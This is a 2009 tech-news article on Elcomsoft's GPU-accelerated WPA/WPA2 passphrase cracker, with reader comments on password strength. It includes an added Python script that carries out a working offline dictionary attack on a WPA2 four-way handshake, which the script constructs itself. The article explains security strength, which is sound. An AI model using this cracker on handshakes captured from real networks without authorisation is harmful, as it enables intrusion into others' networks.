

  (Source: Elcomsoft)
Make sure your WPA/WPA2 passwords are good ones

GPU-powered general-purpose computing is causing all sorts of security nightmares these days, and wireless access points secured with WPA seem to be the latest victim. Elcomsoft, of “Advanced eBook Processor” fame, has released a proprietary WPA/WPA2-PSK cracker that uses GPUs to brute-force passphrases at record speed.

Elcomsoft claims its software can try almost 16,000 passwords per second (p/sec) on a single Radeon HD 4870, using an “advanced dictionary attack” that mutates entries from a master wordlist. Higher-end hardware such as the NVIDIA Tesla S1070 GP-GPU raises the rate to more than 52,000 p/sec, against roughly 1,100 p/sec for an Intel Core 2 Quad Q6600 CPU. The rates look low in absolute terms because WPA-PSK deliberately makes each guess expensive: the passphrase is stretched into the pairwise master key with PBKDF2-HMAC-SHA1 over 4,096 iterations, salted with the network's SSID, so every candidate costs thousands of hash operations before it can even be checked against the captured handshake. That per-guess cost is exactly the kind of embarrassingly parallel work a GPU is good at.

Elcomsoft says the program, known as the “Elcomsoft Wireless Security Auditor”, was designed for network administrators and IT personnel seeking to audit internal security, as well as for external penetration testers and other “white hat” hackers.

While brute-force and dictionary attacks are nothing new, Wireless Security Auditor appears to be one of the most efficient implementations available. It works from a tcpdump/pcap-format capture that contains the WPA four-way handshake, the EAPOL-Key exchange performed when a client joins the network; the two nonces, the two MAC addresses and one MIC-protected frame from that exchange are all the cracker needs to test candidate passphrases. Elcomsoft says all processing is done off-line: the tool sends nothing to the target network, which sees only the passive capture of a normal client association.

HotHardware notes that the way Elcomsoft phrases its “proprietary” dictionary engine most likely means that it doesn’t use third-party programming interfaces such as OpenCL, CUDA, or Stream.

Despite the massive improvements in throughput that GPUs offer over regular CPUs, a full-scale brute-force attack against all but the weakest of WPA passphrases is still infeasible. At 16,000 p/sec, exhausting every 10-character passphrase drawn from all 256 byte values would take a single Radeon HD 4870 over 2 trillion years, which is the figure usually quoted; WPA passphrases are limited to the 95 printable ASCII characters, which shrinks the space to 95^10 and the worst case to roughly 120 million years, still hopelessly out of reach. Even narrowing the possibilities to the 62 characters 0-9 and the upper- and lower-case English alphabet, exhausting 62^10 candidates within a year would take more than 1.6 million such GPUs. What the GPU speed-up does make practical is the wordlist-plus-mutation attack the product actually runs, so what matters is how guessable a passphrase is, not its raw length.
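The offline check described two paragraphs up (a captured four-way handshake tested against candidate passphrases without ever touching the network) and the search-space arithmetic in this paragraph, as an added example in Python. This is not Elcomsoft's code or the page's own; the SSID "ExampleNet", the MAC addresses, the nonces and the small wordlist are constructed here so the script runs offline, and the mutation rules are a toy stand-in for whatever Elcomsoft's engine does.

```python
import hashlib
import hmac
import os
import struct

# Added example: an offline WPA2-PSK dictionary attack of the kind the article
# describes, written for this page (not Elcomsoft's code). The "capture" is
# constructed in-script with a made-up SSID, MAC addresses and random nonces.

PBKDF2_ROUNDS = 4096   # fixed by the WPA/WPA2-PSK specification
MIC_OFFSET = 81        # EAPOL hdr(4) + desc(1) + info(2) + keylen(2) + replay(8)
                       # + nonce(32) + IV(16) + RSC(8) + ID(8): the MIC field starts here


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    These 4096 rounds are what make each guess slow; the SSID is the only salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ROUNDS, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    b = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
         + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]),
                       hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]   # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (RSN, AKM=PSK, descriptor version 2): MIC = HMAC-SHA1(KCK, frame with
    the MIC field zeroed), truncated to 16 bytes. WPA/TKIP would use HMAC-MD5."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay_counter: int) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP): RSN descriptor, key-info 0x010a
    (pairwise, MIC present, version 2), CCMP key length 16, empty key-data field.
    The MIC field is left zeroed; the caller fills it in."""
    body = (struct.pack(">BHHQ", 2, 0x010A, 16, replay_counter)
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16 + struct.pack(">H", 0))                # MIC, key-data length
    return struct.pack(">BBH", 2, 3, len(body)) + body             # EAPOL v2, type Key


def capture_handshake(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> dict:
    """Stand-in for the pcap. What a sniffer sees is the two nonces, the two MAC
    addresses and one MIC-protected frame; the PMK and PTK never go over the air."""
    anonce, snonce = os.urandom(32), os.urandom(32)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = build_msg2(snonce, 1)
    frame = frame[:MIC_OFFSET] + eapol_mic(ptk[:16], frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac,
            "anonce": anonce, "snonce": snonce, "msg2": frame}


def mutate(words):
    """Toy version of the wordlist 'mutation' rules the article mentions:
    case variants plus a two-digit suffix. Real engines apply far more rules."""
    for w in words:
        for v in (w, w.capitalize(), w.upper()):
            yield v
            for n in range(10):
                yield f"{v}{n:02d}"


def crack(capture: dict, candidates):
    """Test each candidate offline: passphrase -> PMK -> PTK -> MIC, compared
    with the MIC in the captured frame. Returns the passphrase or None."""
    target = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in candidates:
        if not 8 <= len(candidate) <= 63:      # WPA passphrase length rule
            continue
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap"], capture["sta"],
                           capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["msg2"]), target):
            return candidate
    return None


def years_to_exhaust(charset_size: int, length: int, guesses_per_sec: float) -> float:
    """Worst-case time to try every passphrase of a given length at a given rate."""
    return charset_size ** length / guesses_per_sec / (365.25 * 24 * 3600)


if __name__ == "__main__":
    cap = capture_handshake("Sunshine07", "ExampleNet",          # constructed network
                            bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"))
    print("recovered:", crack(cap, mutate(["password", "linksys", "sunshine"])))
    for size in (256, 95, 62):
        print(f"{size}^10 at 16,000/s: {years_to_exhaust(size, 10, 16000):.3g} years")
```

Two things the code makes visible that the prose does not. First, the only secret-dependent step is the PBKDF2 derivation; the PTK and MIC computations are cheap, so a GPU cracker spends essentially all its time in `pmk_from_passphrase`, and that step is salted only by the SSID. An attacker can therefore precompute PMKs for common default SSIDs (the "linksys" networks mentioned in the comments) and reuse them against every network with that name, which is one reason to change the default SSID as well as the passphrase. Second, the capture contains nothing that leaks the key: a wrong candidate is rejected purely because its derived MIC does not match, which is why the attack can run entirely offline.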

Elcomsoft lists Wireless Security Auditor at $1,199; however, the software is currently priced at $599.99 until March 1, 2009.

Late last year, security researchers announced that they had used the computing power of 200 PlayStation 3s, over a handful of weekends, to forge a certificate authority certificate. The attack only worked against CAs that still signed certificates with MD5, as opposed to the stronger SHA-1 or SHA-2 family: an MD5 chosen-prefix collision let them obtain a legitimately signed end-entity certificate whose MD5 hash matched a rogue intermediate CA certificate they had prepared. The effect is devastating: with that rogue CA, the attacker can issue fully trusted SSL certificates for any domain, accepted by any browser that trusts the root that signed it, without the real CA's involvement.




RE: Strong passwords...
By jaybuffet on 1/16/2009 8:06:44 AM , Rating: 2
What do you do if a friend comes over and wants to get on your network? That password isn't memorizable, so you have to have it as plain text somewhere. That was the issue I had when I was using KeePass to generate passwords for me. I would constantly have to go back to the app to get my password. So then what happens when my hard drive fails... now I have to do "forgot password" on any site I need to log on to.


RE: Strong passwords...
By Oobu on 1/16/2009 8:15:42 AM , Rating: 3
I actually use a GRC password for my WIFI, and all I do is put it on a text file then copy it to a flash drive when a friend comes over. I set it up, copy and paste, they're in. Not really much fuss and I think it does an excellent job of keeping the neighbors off my connection. For most people, they'd look at mine and see "Area 52" with some ungodly password, and then look over and see two "linksys" with full on cable connections within 100 feet of me, completely wide open. -shrugs- I could disable broadcasting of the ID, but I don't really care at this point.


RE: Strong passwords...
By jonmcc33 on 1/16/2009 12:38:38 PM , Rating: 2
Text file on a USB flash drive. My bigger worry is those that run Windows XP SP2 and don't have the WPA2 patch (KB893357), because I force WPA2. So I put that on my flash drive too. If they had SP3 or Vista it wouldn't be a big deal.

But I like to remain secure, even knowing people can use software and video cards to try 16,000 dictionary words per second...you won't find my password in any dictionary. Even a brute force attempt, do the math on a 63-character randomly generated password. It would never be cracked in my lifetime.


RE: Strong passwords...
By JediJeb on 1/16/2009 2:24:22 PM , Rating: 3
quote:
Even a brute force attempt, do the math on a 63-character randomly generated password. It would never be cracked in my lifetime.


That is of course assuming that the first combination they generate isn't the exact combination you used. It is unlikely but not impossible that if I were to randomly guess a 63 character password it would be correct on the first try.


RE: Strong passwords...
By jonmcc33 on 1/16/2009 9:32:47 PM , Rating: 2
ROFL! That's just too funny. Brute force attacks are started at the lower end first and progress. A brute force would start with 1 character and continue to 2 characters and then to 3, so on and so forth. The brute force would continue on till 63 characters. At that point, after centuries have passed, I will have been long dead. You cannot randomly guess a 63-character password, period. To propose so shows you have very little experience with information security.


RE: Strong passwords...
By GaryJohnson on 1/17/2009 3:50:19 AM , Rating: 2
It's statistically more likely you'll be killed by a zombie WHILE that zombie is being struck by lightning.
Copyright 2014 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki